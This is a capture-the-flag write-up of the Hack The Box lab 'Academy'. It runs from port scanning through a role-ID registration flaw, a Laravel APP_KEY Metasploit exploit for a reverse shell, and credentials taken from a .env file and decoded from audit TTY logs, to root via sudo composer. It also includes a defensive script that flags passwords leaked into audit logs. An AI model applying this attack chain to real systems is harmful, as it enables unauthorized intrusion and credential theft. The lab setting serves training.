
Nmap

Making a script scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 11:27 +08
Nmap scan report for 10.129.20.117
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=11/8%Time=5FA765A9%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.87 seconds

As usual, add the hostname to /etc/hosts.

Visit the academy.htb site: only a background, nothing clickable.


Right-click and look at the source; found the login and register pages.


Tried the default admin creds. No errors were shown; I guess it is either not responsive or the error message is hidden.


Always use Burp when you're unsure about something in web; didn't see anything special.


Moving to register.php, we found something juicy here: there's a roleid parameter.


Registered 2 accounts with different roleid values.

However, both accounts seem similar; it didn't log in to the username I registered, but logged in as egre55 instead.


Tried gobuster, and we found an admin.php.


With the roleid=1 account, managed to find a new subdomain, dev-staging-01.academy.htb; add it to /etc/hosts.


Managed to work out that the site is running on the PHP Laravel framework.

Run searchsploit.


We found a CVE with a Metasploit module; it needs APP_KEY.

set VHOST dev-staging-01.academy.htb
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhosts academy.htb
set lhost 10.10.14.2


And we got www-data.


After searching around, found a password in /var/www/html/academy/.env:

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

...
...
...

Looking at the /home directory, we have a total of 6 users:

www-data@academy:/home$ ls
ls
21y4d ch4p cry0l1t3 egre55 g0blin mrb3n

With trial and error, we managed to su as cry0l1t3, or you can just SSH in to get a proper shell.


$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

Found cry0l1t3 is in the adm group. With a bit of googling:

adm: Group adm is used for system monitoring tasks. Members of this group can read many log files in /var/log, and can use xconsole. Historically, /var/log was /usr/adm (and later /var/adm), thus the name of the group. admin: The admin group is used to grant sudo access on ubuntu 11.10 and earlier

Tons of log events are recorded; with the help of some kind soul, managed to find the right one:

type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

Decode the hex characters and we get mrb3n_Ac@d3my!
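The record above is a type=TTY event, which auditd writes when TTY keystroke auditing (pam_tty_audit) is enabled: everything typed on the terminal, including the password fed to su, lands hex-encoded in the data= field, and anyone in adm can read it. As an added example (not from the original writeup), this parser pulls TTY records out of an audit log, decodes them, and flags the ones captured while a password-prompting command was running, so the exposed credentials can be rotated. The sample log (the writeup's line plus two constructed ones) and the list of password-prompting commands are assumptions made here.

```python
import re

# Constructed sample: the TTY record from the writeup, a second TTY record
# holding an ordinary command, and a non-TTY record that must be ignored.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199300.100:85): tty pid=2530 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A
type=USER_LOGIN msg=audit(1597199310.000:86): pid=2540 uid=0 auid=0 ses=2 msg='op=login id=1002 exe="/usr/sbin/sshd" res=success'
"""

# Assumed list of commands that read a password from the terminal; keystrokes
# logged while one of these is the foreground process are very likely credentials.
PASSWORD_PROMPT_COMMS = {"su", "sudo", "passwd", "ssh", "mysql"}

TTY_RE = re.compile(
    r'^type=TTY msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):.*?'
    r'pid=(?P<pid>\d+) uid=(?P<uid>\d+) auid=(?P<auid>\d+) .*?'
    r'comm="(?P<comm>[^"]*)" data=(?P<data>[0-9A-Fa-f]*)$'
)


def decode_tty_data(hexdata):
    """data= holds the raw keystrokes hex-encoded; a 0A byte is the Enter key."""
    return bytes.fromhex(hexdata).decode("utf-8", errors="replace")


def parse_tty_records(log_text):
    """Return one dict per type=TTY line; other audit record types are skipped."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["keystrokes"] = decode_tty_data(rec["data"])
        records.append(rec)
    return records


def credential_exposures(log_text):
    """(serial, uid, comm) for TTY records taken while a password prompt was active.
    The keystrokes themselves are deliberately left out of the report so it can
    be shared without re-exposing the captured secret."""
    return [(r["serial"], int(r["uid"]), r["comm"])
            for r in parse_tty_records(log_text)
            if r["comm"] in PASSWORD_PROMPT_COMMS]
```

Running credential_exposures over a real /var/log/audit/audit.log tells you which audit serials, and which users' sessions, hold logged passwords.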

Again with trial and error, we are able to log in as mrb3n.

Perform sudo -l:

$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer

Search GTFOBins, and we get an easy root.

root